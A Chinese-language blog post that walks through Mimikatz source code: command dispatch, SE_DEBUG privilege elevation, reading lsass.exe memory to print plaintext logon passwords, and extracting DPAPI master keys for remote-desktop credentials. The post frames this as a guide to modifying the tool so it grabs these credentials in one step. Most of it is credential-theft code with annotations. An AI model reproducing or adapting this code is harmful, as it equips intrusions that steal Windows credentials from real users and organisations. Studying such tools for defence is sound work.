【源码阅读】Mimikatz一键获取远程终端凭据与获取明文密码修改方法
1、前言
mimikatz框架是非常精妙的,粗浅讲一下修改的思路。
它的模块主要由各个结构体数组组成,根据传入的命令搜索执行相应命令的模块
mimikatz.c 部分代码:
NTSTATUS mimikatz_doLocal(wchar_t * input)
{
NTSTATUS status = STATUS_SUCCESS;
// 参数个数定义
int argc;
// 获取输入的值,参数个数赋值
//
wchar_t ** argv = CommandLineToArgvW(input, &argc), *module = NULL, *command = NULL, *match;
unsigned short indexModule, indexCommand;
BOOL moduleFound = FALSE, commandFound = FALSE;
if(argv && (argc > 0))
{
if(match = wcsstr(argv[0], L"::"))
{
if(module = (wchar_t *) LocalAlloc(LPTR, (match - argv[0] + 1) * sizeof(wchar_t)))
{
if((unsigned int) (match + 2 - argv[0]) < wcslen(argv[0]))
//提取::号的后半段字符
command = match + 2;
//将argv[0]源内存块的内容复制到module目标内存块。
RtlCopyMemory(module, argv[0], (match - argv[0]) * sizeof(wchar_t));
}
}
else command = argv[0];
// 索引值为0,如果moduleFound为1且索引值小于模块的数目,循环执行
for(indexModule = 0; !moduleFound && (indexModule < ARRAYSIZE(mimikatz_modules)); indexModule++)
//查找模块
if(moduleFound = (!module || (_wcsicmp(module, mimikatz_modules[indexModule]->shortName) == 0)))
//查找命令
if(command)
for(indexCommand = 0; !commandFound && (indexCommand < mimikatz_modules[indexModule]->nbCommands); indexCommand++)
if(commandFound = _wcsicmp(command, mimikatz_modules[indexModule]->commands[indexCommand].command) == 0)
//调用相关模块函数
status = mimikatz_modules[indexModule]->commands[indexCommand].pCommand(argc - 1, argv + 1);
实际调用模块的方式
//模块调用,对应结构体
const KUHL_M * mimikatz_modules[] = {
&kuhl_m_standard,
&kuhl_m_crypto,
&kuhl_m_sekurlsa,
&kuhl_m_kerberos,
&kuhl_m_privilege,
&kuhl_m_process,
&kuhl_m_service,
&kuhl_m_lsadump,
&kuhl_m_ts,
&kuhl_m_event,
&kuhl_m_misc,
&kuhl_m_token,
&kuhl_m_vault,
&kuhl_m_minesweeper,
#ifdef NET_MODULE
&kuhl_m_net,
#endif
&kuhl_m_dpapi,
&kuhl_m_busylight,
&kuhl_m_sysenv,
&kuhl_m_sid,
&kuhl_m_iis,
&kuhl_m_rpc,
};
如果要添加各种变量作为功能模块。在打开解决方案后,global files目录中的globals.h文件可以添加你设置的全局变量,实现全局调用。
提权函数部分
//提权函数调用
NTSTATUS kuhl_m_privilege_debug(int argc, wchar_t * argv[])
{
return kuhl_m_privilege_simple(SE_DEBUG);
}
主要用更底层的函数,一行API实现进程提权。
NTSTATUS kuhl_m_privilege_simple(ULONG privId)
{
ULONG previousState;
NTSTATUS status;
//提升权限
// RtlAdjustPrivilege(SE_DEBUG, TRUE, FALSE, &previousState);
status = RtlAdjustPrivilege(privId, TRUE, FALSE, &previousState);
if(NT_SUCCESS(status))
kprintf(L"Privilege \'%u\' OK\n", privId);
else
PRINT_ERROR(L"RtlAdjustPrivilege (%u) %08x\n", privId, status);
return status;
}
明文获取密码部分
NTSTATUS kuhl_m_sekurlsa_getLogonData(const PKUHL_M_SEKURLSA_PACKAGE * lsassPackages, ULONG nbPackages)
{
KUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA OptionalData = {lsassPackages, nbPackages};
return kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_logondata, &OptionalData); //明文获取密码2
}
通过调试跟进,发现是从lsass.exe中dump出内存
//根据版本指定调用进程优先级别的函数
DWORD processRights = PROCESS_VM_READ | ((MIMIKATZ_NT_MAJOR_VERSION < 6) ? PROCESS_QUERY_INFORMATION : PROCESS_QUERY_LIMITED_INFORMATION);
BOOL isError = FALSE;
if(!cLsass.hLsassMem)
{
status = STATUS_NOT_FOUND;
if(NT_SUCCESS(lsassLocalHelper->initLocalLib()))
{
if(pMinidumpName)
{
Type = KULL_M_MEMORY_TYPE_PROCESS_DMP;
kprintf(L"Opening : \'%s\' file for minidump...\n", pMinidumpName);
hData = CreateFile(pMinidumpName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
}
else
{
Type = KULL_M_MEMORY_TYPE_PROCESS;
if(kull_m_process_getProcessIdForName(L"lsass.exe", &pid))
hData = OpenProcess(processRights, FALSE, pid); //打开进程
else PRINT_ERROR(L"LSASS process not found (?)\n");
}
在NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalData)的回调函数中输出已经获取的明文数据
//回传数据
retCallback = callback(&sessionData, pOptionalData); //明文密码获取3
明文密码打印位置
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_logondata(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
{
PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA pLsassData = (PKUHL_M_SEKURLSA_GET_LOGON_DATA_CALLBACK_DATA) pOptionalData;
ULONG i;
//PDWORD sub = NULL;
if((pData->LogonType != Network)/* && pData->LogonType != UndefinedLogonType*/)
{
//if(IsValidSid(pData->pSid) && GetSidSubAuthorityCount(pData->pSid))
// sub = GetSidSubAuthority(pData->pSid, 0);
//if(!sub || (*sub != 90 && *sub != 96))
//{
//这个函数负责获取需要打印的数据
kuhl_m_sekurlsa_printinfos_logonData(pData);
//循环输出
for(i = 0; i < pLsassData->nbPackages; i++)
{
if(pLsassData->lsassPackages[i]->Module.isPresent && lsassPackages[i]->isValid)
{
kprintf(L"\t%s :\t", pLsassData->lsassPackages[i]->Name);
pLsassData->lsassPackages[i]->CredsForLUIDFunc(pData);
kprintf(L"\n");
}
}
//}
}
return TRUE;
}
获取远程会话终端凭据部分
NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
{
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_dpapi, NULL); //获取全部用户Guid
return STATUS_SUCCESS;
}
在BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)处是存储会话的Guid和MasterKey所在的位置。
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_MASTERKEY_CACHE_ENTRY)))
{
if(SecEqualLuid(pData->LogonId, &mesCredentials.LogonId))
{
kprintf(L"\t [%08x]\n\t * GUID :\t", monNb++);
kull_m_string_displayGUID(&mesCredentials.KeyUid); //获取Guid
kprintf(L"\n\t * Time :\t"); kull_m_string_displayLocalFileTime(&mesCredentials.insertTime);
if(aKey.address = LocalAlloc(LPTR, mesCredentials.keySize))
{
aLsass.address = (PBYTE) aLsass.address + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key);
if(kull_m_memory_copy(&aKey, &aLsass, mesCredentials.keySize))
{
(*pData->lsassLocalHelper->pLsaUnprotectMemory)(aKey.address, mesCredentials.keySize);
kprintf(L"\n\t * MasterKey :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 0); //获取MasterKey
.....
2、效果图
执行多条命令
批量对比